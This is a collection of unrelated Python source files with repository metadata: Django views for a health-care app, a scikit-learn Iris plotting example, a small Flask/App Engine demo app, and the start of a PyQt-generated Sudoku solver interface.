HealthProfessionalNotificationEditForm,\
HealthProfessionalOutOfOfficeEditForm
from apps.account.forms import SetPasswordForm
from apps.healthperson.healthprofessional.models import HealthProfessional
from apps.questionnaire.models import QuestionnaireRequest
from django.utils.translation import ugettext as _
from PIL import Image
from django.contrib.auth.models import Group
from apps.account.models import User
from core.encryption.random import randomkey
from django.db.models import Q
from dateutil import parser
from apps.healthperson.utils import is_allowed_healthprofessional,\
is_allowed_manager, is_allowed_manager_and_healthprofessional, login_url
from apps.rcmessages.views import get_all_messages_for_healthprofessional
from django.core.files.uploadedfile import InMemoryUploadedFile
from apps.base.views import BaseIndexTemplateView
from django.views.generic.base import View, TemplateView
from django.utils.decorators import method_decorator
from core.views import FormView
from apps.healthperson.views import BaseAddView
from django.http import Http404
PHOTO_WIDTH = 133
PHOTO_HEIGHT = 165
class HealthProfessionalBaseView(View):
"""
Base view which adds the healthprofessional by
using the healthprofessional_session_id
or logged in user
"""
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
"""Adds healthprofessional to the view class"""
if 'healthprofessional_session_id' in kwargs:
healthprofessional_session_id = kwargs.get(
'healthprofessional_session_id')
if healthprofessional_session_id not in self.request.session:
raise Http404
healthperson_ptr_id =\
self.request.session[healthprofessional_session_id][8:]
try:
self.healthprofessional =\
HealthProfessional.objects.select_related(
'user__personal_encryption_key').get(
healthperson_ptr_id=healthperson_ptr_id)
except HealthProfessional.DoesNotExist:
raise Http404
else:
# set healthprofessional to self.
self.healthprofessional = self.request.user.healthperson
return super(
HealthProfessionalBaseView, self).dispatch(*args, **kwargs)
def get_context_data(self, **kwargs):
"""Base context, include the healthprofessional by default"""
context = super(HealthProfessionalBaseView,
self).get_context_data(**kwargs)
context.update({'healthprofessional': self.healthprofessional})
if hasattr(self, 'submenu'):
context.update({'submenu': self.submenu})
return context
class HealthProfessionalIndexView(BaseIndexTemplateView,
HealthProfessionalBaseView):
"""
This view shows the homepage of the healthprofessional
"""
template_name = 'healthprofessional/index.html'
def get_controles_for_healthprofessional(self, healthprofessional):
"""
Adds controles and urgent_patient_controles to the view so
they can be shown in the overview.
Args:
- healthprofessional: The healthprofessional to get all\
all controles for
"""
# Get the controles (appointment_healthprofessional =
# self or controle_healthprofessional=self))
controle_filter_base = (Q(
practitioner=healthprofessional) |
Q(appointment__appointment_healthprofessional=healthprofessional))
controle_filter_base = controle_filter_base & Q(
finished_on__isnull=False)
# Re-add controles after handling but still appointment_needed with:
# | (Q(appointment_needed = True) &
# Q(appointment_added_on__isnull = True))
extra_filter_base = Q(handled_on__isnull=True)
# Show (urgent) controles which are finished & (not handled)
# For re-adding controles with (handled & no appointment)
# see comments above...
controle_filter = controle_filter_base & (extra_filter_base)
# urgent_controle_filter = Q(urgent=True) & controle_filter_base & (
# extra_filter_base)
controles = QuestionnaireRequest.objects.filter(
controle_filter).order_by('-finished_on')
self.urgent_patient_controles = []
self.controles = []
for controle in controles:
if controle.urgent:
self.urgent_patient_controles.append(controle)
else:
self.controles.append(controle)
def get_context_data(self, **kwargs):
context = super(HealthProfessionalIndexView,
self).get_context_data(**kwargs)
self.get_controles_for_healthprofessional(self.healthprofessional)
controles = list(self.controles)
urgent_patient_controles = list(self.urgent_patient_controles)
# Add controles from healthprofessionals for which
# the logged-in healthprofessional is the replacement.
for hp_to_replace in self.healthprofessional.replacement_set.all():
if ((hp_to_replace.out_of_office_start <= date.today() and
hp_to_replace.out_of_office_end >= date.today())):
[extra_controles, extra_urgent_patient_controles] =\
self.get_controles_for_healthprofessional(hp_to_replace)
for extra_controle in extra_controles:
if extra_controle not in controles:
controles.append(extra_controle)
temp_controles = extra_urgent_patient_controles
for extra_urgent_patient_controle in temp_controles:
if ((extra_urgent_patient_controle not in
urgent_patient_controles)):
urgent_patient_controles.append(
extra_urgent_patient_controle)
try:
message = get_all_messages_for_healthprofessional(
self.healthprofessional)[0]
except IndexError:
message = None
context.update({'message': message,
'controles': controles,
'urgent_patient_controles': urgent_patient_controles,
'healthprofessional': self.healthprofessional})
return context
class SearchView(TemplateView):
"""Generic search page as available in the homepage"""
template_name = 'healthprofessional/search_index.html'
@method_decorator(login_required)
@method_decorator(user_passes_test(
is_allowed_healthprofessional, login_url=login_url))
def dispatch(self, *args, **kwargs):
"""Init default values to be used in the context"""
self.patients = []
self.no_search_term = False
return super(SearchView, self).dispatch(*args, **kwargs)
def post(self, request, *args, **kwargs):
"""Search for patients"""
if 'searchterm' in request.POST:
patients = []
searchterm = request.POST['searchterm']
if searchterm not in (None, ''):
# Build up search filter for persons
hospital = request.user.hospital
user_filter = Q(groups__name='patients') &\
Q(hospital=hospital) & Q(deleted_on__isnull=True)
user_filter2 = Q(hmac_last_name=searchterm)
user_filter2 = user_filter2 | Q(
hmac_first_name=searchterm)
user_filter2 = user_filter2 | Q(
hmac_BSN=searchterm)
# try parsing the filled in searchterm to a date,
# if failed don't include it.
try:
date = parser.parse(searchterm, dayfirst=True)
except (ValueError, TypeError):
date = None
if date:
user_filter2 = user_filter2 | Q(date_of_birth=date)
user_filter = user_filter & user_filter2
# Execute filter
users = User.objects.filter(user_filter)
patients = [user.healthperson for user in users]
else:
self.no_search_term = True
self.patients = patients
return self.get(request, *args, **kwargs)
def get_context_data(self, **kwargs):
"""Return the found patients in a context"""
context = super(SearchView, self).get_context_data(**kwargs)
context.update({'patients': self.patients,
'no_search_term': self.no_search_term})
return context
class HealthProfessionalCropPhoto(HealthProfessionalBaseView, TemplateView):
"""
View allows to crop the photo of the healthprofessional, if necessary.
"""
template_name = 'healthprofessional/photo_crop.html'
submenu = 'photo'
@method_decorator(user_passes_test(
is_allowed_manager_and_healthprofessional, login_url=login_url))
def dispatch(self, *args, **kwargs):
return super(HealthProfessionalCropPhoto,
self).dispatch(*args, **kwargs)
def post(self, request, *args, **kwargs):
self.healthprofessional.photo_location.open('r')
image_file = self.healthprofessional.photo_location._file
image = Image.open(image_file.file)
x_offset = int(request.POST['x1'])
y_offset = int(request.POST['y1'])
# crop image...
image = image.crop(
(x_offset, y_offset,
x_offset + PHOTO_WIDTH, y_offset + PHOTO_HEIGHT))
# Save in memory temporarily to change photo name
image_io = StringIO.StringIO()
image.save(image_io, 'PNG', quality=100)
image_file = InMemoryUploadedFile(
image_io, None,
self.healthprofessional.photo_location.name,
'image/png', image_io.len, None)
# Remove old file, save new file & update field
self.healthprofessional.photo_location.delete()
self.healthprofessional.photo_location.save(
User.objects.make_random_password(length=10) + '.png', image_file)
image_file = None
image = None
image_io = None
return HttpResponseRedirect(reverse(
'healthprofessional_view_photo',
args=(self.kwargs.get('healthprofessional_session_id'),)))
class HealthProfessionalEditPhoto(HealthProfessionalBaseView, FormView):
"""
Add/edit or remove the photo of an healthprofessional
"""
template_name = 'healthprofessional/edit_view.html'
form_class = HealthProfessionalPhotoForm
@method_decorator(user_passes_test(
is_allowed_manager_and_healthprofessional, login_url=login_url))
def dispatch(self, *args, **kwargs):
self.photo_error = None
self.success_url = reverse(
'healthprofessional_view_photo',
args=(self.kwargs.get('healthprofessional_session_id'),))
return super(HealthProfessionalEditPhoto,
self).dispatch(*args, **kwargs)
def get_form_kwargs(self):
kwargs = super(HealthProfessionalEditPhoto, self).get_form_kwargs()
kwargs.update({'instance': self.healthprofessional})
return kwargs
def get_context_data(self, **kwargs):
context = super(HealthProfessionalEditPhoto,
self).get_context_data(**kwargs)
context.update({'cancel_url': self.success_url, 'upload_photo': True,
'section': _('Behandelaar pasfoto')})
return context
def resize_photo(self, image):
x_ratio = float(image.size[0]) / PHOTO_WIDTH
y_ratio = float(image.size[1]) / PHOTO_HEIGHT
if y_ratio > x_ratio:
new_y = int(float(image.size[1]) / x_ratio)
new_x = PHOTO_WIDTH
else:
new_y = PHOTO_HEIGHT
new_x = int(float(image.size[0]) / y_ratio)
image = image.resize((new_x, new_y))
return image
def form_valid(self, form):
healthprofessional = form.save(commit=False)
photo_error = None
# check size and if to large resize
image_file = healthprofessional.photo_location._file
if image_file:
image = Image.open(image_file.file)
if image.size[0] < PHOTO_WIDTH or image.size[1] < PHOTO_HEIGHT:
photo_error = _('Pasfoto is te klein, minimaal: ') +\
str(PHOTO_WIDTH) + 'x' + str(PHOTO_HEIGHT) + 'px'
if not photo_error:
if ((image.size[0] != PHOTO_WIDTH and
image.size[1] != PHOTO_HEIGHT)):
image = self.resize_photo(image)
image_file = StringIO.StringIO()
image.save(image_file, 'PNG', quality=100)
healthprofessional.photo_location._file.file = image_file
healthprofessional.photo_location.name =\
User.objects.make_random_password(length=10) + '.png'
healthprofessional.save()
if ((image.size[0] != PHOTO_WIDTH or
image.size[1] != PHOTO_HEIGHT)):
# still not perfect.. need to crop
crop_url = reverse(
'healthprofessional_crop_photo',
args=(self.kwargs.get(
'healthprofessional_session_id'),))
return HttpResponseRedirect(crop_url)
else:
return super(HealthProfessionalEditPhoto,
self).form_valid(form)
else:
image_file = StringIO.StringIO()
image.save(image_file, 'PNG', quality=100)
healthprofessional.photo_location._file.file = image_file
healthprofessional.photo_location.name =\
User.objects.make_random_password(length=10) + '.png'
healthprofessional.save()
return super(HealthProfessionalEditPhoto,
self).form_valid(form)
else:
form.errors['photo_location'] = photo_error
return self.form_invalid(form)
else:
# done nothing or remove..
healthprofessional.save()
return super(HealthProfessionalEditPhoto, self).form_valid(form)
class HealthProfessionalPhotoView(HealthProfessionalBaseView, TemplateView):
"""
Show photo of healthprofessional
"""
template_name = 'healthprofessional/photo_view.html'
submenu = 'photo'
@method_decorator(user_passes_test(
is_allowed_manager_and_healthprofessional, login_url=login_url))
def dispatch(self, *args, **kwargs):
return super(HealthProfessionalPhotoView,
self).dispatch(*args, **kwargs)
class HealthProfessionalNotificationView(HealthProfessionalBaseView,
TemplateView):
"""
Show notification settings
"""
template_name = 'healthprofessional/notification_view.html'
submenu = 'notification'
@method_decorator(user_passes_test(
is_allowed_manager_and_healthprofessional, login_url=login_url))
def dispatch(self, *args, **kwargs):
return super(HealthProfessionalNotificationView,
self).dispatch(*args, **kwargs)
def get_context_data(self, **kwargs):
context = super(HealthProfessionalNotificationView,
self).get_context_data(**kwargs)
return context
class HealthProfessionalOutOfOfficeView(HealthProfessionalBaseView,
TemplateView):
"""
Show out of office settings
"""
template_name = 'healthprofessional/out_of_office_view.html'
submenu = 'out_of_office'
@method_decorator(user_passes_test(
is_allowed_manager_and_healthprofessional, login_url=login_url))
def dispatch(self, *args, **kwargs):
return super(HealthProfessionalOutOfOfficeView,
self).dispatch(*args, **kwargs)
def get_context_data(self, **kwargs):
context = super(HealthProfessionalOutOfOfficeView,
self).get_context_data(**kwargs)
return context
class HealthProfessionalOutOfOfficeEdit(HealthProfessionalBaseView,
FormView):
"""
Edit the out of office settings for an healthprofessional.
These settings are used to configure an out of office period
with a replacement.
"""
template_name = 'healthprofessional/edit_view.html'
form_class = HealthProfessionalOutOfOfficeEditForm
@method_decorator(user_passes_test(
is_allowed_manager_and_healthprofessional, login_url=login_url))
def dispatch(self, *args, **kwargs):
self.success_url = reverse(
'healthprofessional_view_out_of_office',
args=(self.kwargs.get('healthprofessional_session_id'),))
return super(HealthProfessionalOutOfOfficeEdit,
self).dispatch(*args, **kwargs)
def get_form_kwargs(self):
kwargs = super(HealthProfessionalOutOfOfficeEdit,
self).get_form_kwargs()
kwargs.update({'instance': self.healthprofessional})
return kwargs
def get_context_data(self, **kwargs):
context = super(HealthProfessionalOutOfOfficeEdit,
self).get_context_data(**kwargs)
context.update({'cancel_url': self.success_url,
'section': _('Afwezigheid')})
return context
def form_valid(self, form):
healthprofessional = form.save(commit=False)
healthprofessional.save()
return super(HealthProfessionalOutOfOfficeEdit,
self).form_valid(form)
class HealthProfessionalNotificationEdit(HealthProfessionalBaseView, FormView):
"""
Edit the notification settings for an healthprofessional.
These settings are used for sending notifications of unhandeld
(urgent) controls.
"""
template_name = 'healthprofessional/edit_view.html'
form_class = HealthProfessionalNotificationEditForm
@method_decorator(user_passes_test(
is_allowed_manager_and_healthprofessional, login_url=login_url))
def dispatch(self, *args, **kwargs):
self.success_url = reverse(
'healthprofessional_view_notification',
args=(self.kwargs.get('healthprofessional_session_id'),))
return super(HealthProfessionalNotificationEdit,
self).dispatch(*args, **kwargs)
def get_form_kwargs(self):
kwargs = super(HealthProfessionalNotificationEdit,
self).get_form_kwargs()
kwargs.update({'instance': self.healthprofessional})
return kwargs
def get_context_data(self, **kwargs):
context = super(HealthProfessionalNotificationEdit,
self).get_context_data(**kwargs)
context.update({'cancel_url': self.success_url,
'section': _('Notificatie instellingen')})
return context
def form_valid(self, form):
healthprofessional = form.save(commit=False)
healthprofessional.save()
return super(HealthProfessionalNotificationEdit, self).form_valid(form)
class HealthProfessionalPersonaliaView(HealthProfessionalBaseView,
TemplateView):
"""
Shows the personalia of an healhtprofessional which is the information
stored in the coupled :class:`apps.account.models.User` instance.
"""
template_name = 'healthprofessional/personalia_view.html'
submenu = 'personalia'
@method_decorator(user_passes_test(
is_allowed_manager_and_healthprofessional, login_url=login_url))
def dispatch(self, *args, **kwargs):
return super(HealthProfessionalPersonaliaView,
self).dispatch(*args, **kwargs)
class HealthProfessionalSetPassword(HealthProfessionalBaseView, FormView):
"""
Displays a form to set a password. Used to initialize password for an healthprofessional
"""
template_name = 'healthprofessional/edit_view.html'
form_class = SetPasswordForm
@method_decorator(user_passes_test(
is_allowed_manager_and_healthprofessional, login_url=login_url))
def dispatch(self, *args, **kwargs):
self.success_url = self.request.session.get('next_url', None)
return super(HealthProfessionalSetPassword,
self).dispatch(*args, **kwargs)
def get_form_kwargs(self):
kwargs = super(
HealthProfessionalSetPassword, self).get_form_kwargs()
kwargs.update({'user': self.healthprofessional.user})
return kwargs
def get_context_data(self, **kwargs):
context = super(HealthProfessionalSetPassword,
self).get_context_data(**kwargs)
context.update({'cancel_url': self.success_url,
'section': _('Zet wachtwoord'),
'extra_info': _('U heeft nog geen wachtwoord ingesteld voor RemoteCare. ' +\
'Geef deze hieronder op om (ook) direct in RemoteCare te kunnen inloggen.')})
return context
def form_valid(self, form):
# Change password (optional)
user = self.healthprofessional.user
user.set_password(form.cleaned_data['password'])
# save user
user.save()
return super(HealthProfessionalSetPassword, self).form_valid(form)
class HealthProfessionalPersonaliaEdit(HealthProfessionalBaseView, FormView):
"""
Edit the personalia of an healhtprofessional which is the information
stored in the coupled :class:`apps.account.models.User` instance.
"""
template_name = 'healthprofessional/edit_view.html'
form_class = HealthProfessionalEditForm
@method_decorator(user_passes_test(
is_allowed_manager_and_healthprofessional, login_url=login_url))
def dispatch(self, *args, **kwargs):
self.success_url = reverse(
'healthprofessional_view_personalia',
args=(self.kwargs.get('healthprofessional_session_id'),))
return super(HealthProfessionalPersonaliaEdit,
self).dispatch(*args, **kwargs)
def get_form_kwargs(self):
kwargs = super(
HealthProfessionalPersonaliaEdit, self).get_form_kwargs()
kwargs.update({'instance': self.healthprofessional.user})
return kwargs
def get_context_data(self, **kwargs):
context = super(HealthProfessionalPersonaliaEdit,
self).get_context_data(**kwargs)
context.update({'cancel_url': self.success_url,
'section': _('Personalia & Account')})
return context
def form_valid(self, form):
user = form.save(commit=False)
# Change password (optional)
if form.cleaned_data['change_password'] == 'yes':
user.set_password(form.cleaned_data['password'])
# save user
user.save()
self.healthprofessional.function = form.cleaned_data['function']
self.healthprofessional.specialism = form.cleaned_data['specialism']
self.healthprofessional.telephone = form.cleaned_data['telephone']
self.healthprofessional.save()
return super(HealthProfessionalPersonaliaEdit, self).form_valid(form)
class HealthProfessionalSearchView(FormView):
"""
Search for an healthprofessional as a manager
"""
template_name = 'healthprofessional/search.html'
form_class = HealthProfessionalSearchForm
@method_decorator(login_required)
@method_decorator(user_passes_test(is_allowed_manager,
login_url=login_url))
def dispatch(self, *args, **kwargs):
self.has_searched = False
self.healthprofessionals = None
return super(HealthProfessionalSearchView,
self).dispatch(*args, **kwargs)
def get_context_data(self, **kwargs):
"""Add the search results to the context"""
context = super(HealthProfessionalSearchView,
self).get_context_data(**kwargs)
context.update({'healthprofessionals': self.healthprofessionals,
'has_searched': self.has_searched})
return context
def get_initial(self):
"""
Get initial data, used for showing the old results
and form data when
the user uses the back button to return to the form
"""
if (('last_search' in self.request.session and
'back' in self.request.GET)):
return self.request.session['last_search']
return None
def get(self, request, *args, **kwargs):
"""Re-execute the search if the user has used the back button"""
if 'last_search' in request.session and 'back' in request.GET:
form_class = self.get_form_class()
form = form_class(request.session['last_search'])
if form.is_valid():
self.form_valid(form)
return super(HealthProfessionalSearchView,
self).get(request, *args, **kwargs)
def form_valid(self, form):
"""Perform the search action, search for a healthprofessional"""
self.has_searched = True
filter_valid = False
healthprofessionals = None
# Build up search filter for persons
hospital = self.request.user.hospital
user_filter = Q(groups__name='healthprofessionals') &\
Q(hospital=hospital) & Q(deleted_on__isnull=True)
if form.cleaned_data['last_name'] not in ('', None):
user_filter = user_filter & Q(
hmac_last_name=form.cleaned_data['last_name'])
filter_valid = True
if form.cleaned_data['first_name'] not in ('', None):
user_filter = user_filter & Q(
hmac_first_name=form.cleaned_data['first_name'])
filter_valid = True
if form.cleaned_data['function'] not in ('', None):
function = form.cleaned_data['function']
user_filter = user_filter &\
Q(healthperson__healthprofessional__function=function)
filter_valid = True
if form.cleaned_data['specialism'] not in ('', None):
specialism = form.cleaned_data['specialism']
user_filter = user_filter &\
Q(healthperson__healthprofessional__specialism=specialism)
filter_valid = True
if filter_valid:
# Execute filter
users = User.objects.filter(user_filter)
if self.request.POST:
self.request.session['last_search'] = self.request.POST
healthprofessionals = []
for user in users:
healthprofessionals.append(user.healthperson)
self.healthprofessionals = healthprofessionals
return super(HealthProfessionalSearchView,
self).get(self.request, *self.args, **self.kwargs)
class HealthProfessionalAddView(BaseAddView):
"""
Class based view for adding a new healthprofessional
"""
template_name = 'healthprofessional/add.html'
form_class = HealthProfessionalAddForm
@method_decorator(login_required)
@method_decorator(user_passes_test(
is_allowed_manager, login_url=login_url))
def dispatch(self, *args, **kwargs):
self.succes_url = reverse('index')
return super(HealthProfessionalAddView, self).dispatch(*args, **kwargs)
def form_valid(self, form):
user = self.get_user_for_form(form)
healthprofessional = HealthProfessional()
healthprofessional.function = form.cleaned_data['function']
healthprofessional.specialism = form.cleaned_data['specialism']
healthprofessional.telephone = form.cleaned_data['telephone']
# add to healthprofessionals group
user.groups = [Group.objects.get(name='healthprofessionals')]
healthprofessional.changed_by_user = self.request.user
healthprofessional.save()
user.healthperson = healthprofessional
user.save()
sent_password_change_request(user, self.url_prefix, False, True)
healthprofessional_session_id = randomkey()
self.request.session[healthprofessional_session_id] =\
'storage_{0}'.format(healthprofessional.health_person_id)
self.success_url = reverse('healthprofessional_view_personalia',
args=(healthprofessional_session_id,))
return super(HealthProfessionalAddView, self).form_valid(form)
class HealthProfessionalRemove(HealthProfessionalBaseView, TemplateView):
"""
Remove the healthprofessional by setting the deleted_on attribute
on the coupled :class:`apps.account.models.User` instance.
"""
template_name = 'healthprofessional/remove_confirmation.html'
@method_decorator(user_passes_test(is_allowed_manager,
login_url=login_url))
def dispatch(self, *args, **kwargs):
self.cancel_url = reverse('healthprofessional_search')
return super(HealthProfessionalRemove, self).dispatch(*args, **kwargs)
def post(self, request, *args, **kwargs):
"""
Remove the healthprofessional by setting the user to inactive
"""
user = self.healthprofessional.user
user.deleted_on = date.today()
user.set_unusable_password()
user.is_active = False
user.changed_by_user = self.request.user
user.save()
return HttpResponseRedirect(self.cancel_url)
def get_context_data(self, **kwargs):
context = super(HealthProfessionalRemove,
self).get_context_data(**kwargs)
context.update({'cancel_url': self.cancel_url})
return context
| acesonl/remotecare | remotecare/apps/healthperson/healthprofessional/views.py | Python | gpl-3.0 | 30,894 |
__all__ = ['ttypes', 'constants', 'rataservice']
| leonidas/roboio | tests/servers/gen-py/rataservice/__init__.py | Python | lgpl-2.1 | 49 |
# -*- coding: utf-8 -*-
"""
=========================================================
The Iris Dataset
=========================================================
This data sets consists of 3 different types of irises'
(Setosa, Versicolour, and Virginica) petal and sepal
length, stored in a 150x4 numpy.ndarray
The rows being the samples and the columns being:
Sepal Length, Sepal Width, Petal Length and Petal Width.
The below plot uses the first two features.
See `here <https://en.wikipedia.org/wiki/Iris_flower_data_set>`_ for more
information on this dataset.
"""
# Code source: Gaël Varoquaux
# Modified for documentation by Jaques Grobler
# License: BSD 3 clause
import matplotlib.pyplot as plt
from sklearn import datasets
from sklearn.decomposition import PCA
# import some data to play with
iris = datasets.load_iris()
X = iris.data[:, :2] # we only take the first two features.
y = iris.target
x_min, x_max = X[:, 0].min() - 0.5, X[:, 0].max() + 0.5
y_min, y_max = X[:, 1].min() - 0.5, X[:, 1].max() + 0.5
plt.figure(2, figsize=(8, 6))
plt.clf()
# Plot the training points
plt.scatter(X[:, 0], X[:, 1], c=y, cmap=plt.cm.Set1, edgecolor="k")
plt.xlabel("Sepal length")
plt.ylabel("Sepal width")
plt.xlim(x_min, x_max)
plt.ylim(y_min, y_max)
plt.xticks(())
plt.yticks(())
# To getter a better understanding of interaction of the dimensions
# plot the first three PCA dimensions
fig = plt.figure(1, figsize=(8, 6))
ax = fig.add_subplot(111, projection="3d", elev=-150, azim=110)
X_reduced = PCA(n_components=3).fit_transform(iris.data)
ax.scatter(
X_reduced[:, 0],
X_reduced[:, 1],
X_reduced[:, 2],
c=y,
cmap=plt.cm.Set1,
edgecolor="k",
s=40,
)
ax.set_title("First three PCA directions")
ax.set_xlabel("1st eigenvector")
ax.w_xaxis.set_ticklabels([])
ax.set_ylabel("2nd eigenvector")
ax.w_yaxis.set_ticklabels([])
ax.set_zlabel("3rd eigenvector")
ax.w_zaxis.set_ticklabels([])
plt.show()
| manhhomienbienthuy/scikit-learn | examples/datasets/plot_iris_dataset.py | Python | bsd-3-clause | 1,939 |
from flask import render_template, Flask, request, redirect, url_for, current_app
from app import app
import urllib2
from bs4 import BeautifulSoup
from flaskext import wtf
from flaskext.wtf import Form, TextField, TextAreaField, \
SubmitField, validators, ValidationError, IntegerField
from google.appengine.ext import db
import json
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
class ContactForm(Form):
name = TextField("Name", [validators.Required("Please enter your name.")])
email = TextField(
"Email", [validators.Required("Please enter email address."),
validators.Email("Please enter valid email address.")])
subject = TextField(
"Subject", [validators.Required("Please enter a subject.")])
message = TextAreaField(
"Message", [validators.Required("Please enter a subject.")])
submit = SubmitField("Send")
class Tweet(db.Model):
photo = db.BlobProperty()
comment = db.StringProperty()
def setPhoto(self, filestream):
self.photo = db.Blob(filestream)
def setExif(self, exif):
self.exif = json.dumps(exif)
def getExif(self):
return json.loads(self.exif)
class TweetURL(object):
url = ''
comment = ''
@app.route('/')
@app.route('/index')
def index():
a = 123
b = [123, '353', 'abc']
return render_template('index.html', a=a, b=b, c='ccc')
@app.route('/hi', methods=['GET', 'POST'])
def hi():
get = None
post1 = None
post2 = None
if request.method == 'GET':
get = request.args.get("get1")
if request.method == 'POST':
post1 = request.form.get("post1")
post2 = request.form.get("post2")
return render_template('hi.html',
get_val=get, post_val1=post1, post_val2=post2)
@app.route('/first', methods=['GET'])
def first():
if request.method == 'GET':
get = request.args.get("get")
if request.args.get("google"):
return redirect('https://www.google.co.kr/?gws_rd=ssl#\
newwindow=1&q=' + get)
if request.args.get("naver"):
return redirect('http://search.naver.com/search.naver?where=\
nexearch&query=' + get)
if request.args.get("daum"):
return redirect('http://search.daum.net/search?w=tot&DA=YZR&t\
__nil_searchbox=btn&sug=&o=&q=' + get)
return render_template('first.html')
@app.route('/second', methods=['GET'])
def second():
if request.method == 'GET' and request.args:
htmlSource = request.args.get("url")
# url exception
if htmlSource[0:7] != "http://":
return render_template("second.html")
tagName = request.args.get("tagName")
if request.args.get("classTag"):
tagName = "." + tagName
if request.args.get("idTag"):
tagName = "#" + tagName
htmltext = urllib2.urlopen(htmlSource).read()
soup = BeautifulSoup(htmltext, from_encoding="utf-8")
arr = []
for tag in soup.select(tagName):
arr.append(tag.get_text())
return render_template('second.html', arr=arr)
else:
return render_template('second.html')
@app.route('/index1')
def index1():
return render_template('index1.html')
@app.route('/third', methods=['GET', 'POST'])
def third():
form = ContactForm()
if request.method == 'POST':
if not form.validate():
return render_template('third.html', form=form)
else:
return "Nice to meet you, " + form.name.data + "!"
return render_template('third.html', form=form)
class NaverForm(Form):
genre = IntegerField(
"genre", [validators.Required("Please enter genre number.")])
submit = SubmitField("Send")
@app.route('/forth', methods=['GET', 'POST'])
def forth():
form = NaverForm()
if request.method == 'POST':
if not form.validate():
return render_template('forth.html', form=form)
else:
# crawl
url = "http://news.naver.com/main/list.nhn?mode=LSD&mid=sec&sid1=" + str(form.genre.data)
htmltext = urllib2.urlopen(url).read()
soup = BeautifulSoup(htmltext, from_encoding="utf-8")
arr = []
# arr1 = []
titles = soup.find_all('a', 'nclicks(fls.list)')
for tag in titles:
# arr1.append(len(tag.get_text()))
if len(tag.get_text()) > 2:
arr.append(tag.get_text())
return render_template('forth.html', arr=arr[:10], form=form,
titles=titles)
return render_template('forth.html', form=form)
@app.route('/tweet', methods=['GET', 'POST'])
def tweet():
if request.form:
upload_data = Tweet()
if request.files.get('photo'):
post_photo = request.files.get('photo')
filestream = post_photo.read()
upload_data.photo = db.Blob(filestream)
# print post_photo
post_comment = request.form.get('comment')
upload_data.comment = post_comment
upload_data.put()
tweetURLs = []
for tweet in Tweet.all():
tweetURL = TweetURL()
if tweet.photo:
tweetURL.url = url_for("show", key=tweet.key())
tweetURL.comment = tweet.comment
tweetURLs.append(tweetURL)
return render_template('tweet.html', tweetURLs=tweetURLs)
@app.route('/show/<key>', methods=['GET'])
def show(key):
uploaded_data = db.get(key)
return current_app.response_class(uploaded_data.photo)
@app.errorhandler(404)
def page_not_found(e):
"""Return a custom 404 error."""
return 'Sorry, nothing at this URL.', 404
| kho0810/likelion_Web | app/views.py | Python | apache-2.0 | 5,752 |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui_sudoku_solver.ui'
#
# Created: Mon Dec 30 21:16:20 2013
# by: PyQt4 UI code generator 4.10
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(805, 543)
MainWindow.setDockOptions(QtGui.QMainWindow.AllowTabbedDocks|QtGui.QMainWindow.AnimatedDocks)
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.horizontalLayout = QtGui.QHBoxLayout(self.centralwidget)
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.widget = QtGui.QWidget(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.widget.sizePolicy().hasHeightForWidth())
self.widget.setSizePolicy(sizePolicy)
self.widget.setToolTip(_fromUtf8(""))
self.widget.setStyleSheet(_fromUtf8(""))
self.widget.setObjectName(_fromUtf8("widget"))
self.sudokugrid = SudokuGrid(self.widget)
self.sudokugrid.setGeometry(QtCore.QRect(0, 0, 491, 461))
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.sudokugrid.sizePolicy().hasHeightForWidth())
self.sudokugrid.setSizePolicy(sizePolicy)
self.sudokugrid.setToolTip(_fromUtf8(""))
self.sudokugrid.setFrameShape(QtGui.QFrame.NoFrame)
self.sudokugrid.setFrameShadow(QtGui.QFrame.Raised)
self.sudokugrid.setLineWidth(1)
self.sudokugrid.setObjectName(_fromUtf8("sudokugrid"))
self.gridLayout_10 = QtGui.QGridLayout(self.sudokugrid)
self.gridLayout_10.setMargin(0)
self.gridLayout_10.setObjectName(_fromUtf8("gridLayout_10"))
self.mainGridLayout = QtGui.QGridLayout()
self.mainGridLayout.setSizeConstraint(QtGui.QLayout.SetDefaultConstraint)
self.mainGridLayout.setObjectName(_fromUtf8("mainGridLayout"))
self.gridLayout_5 = QtGui.QGridLayout()
self.gridLayout_5.setSpacing(0)
self.gridLayout_5.setObjectName(_fromUtf8("gridLayout_5"))
self.label_3_3 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_3_3.sizePolicy().hasHeightForWidth())
self.label_3_3.setSizePolicy(sizePolicy)
self.label_3_3.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_3_3.setFont(font)
self.label_3_3.setAutoFillBackground(False)
self.label_3_3.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_3_3.setFrameShape(QtGui.QFrame.Panel)
self.label_3_3.setLineWidth(1)
self.label_3_3.setText(_fromUtf8(""))
self.label_3_3.setTextFormat(QtCore.Qt.PlainText)
self.label_3_3.setScaledContents(False)
self.label_3_3.setAlignment(QtCore.Qt.AlignCenter)
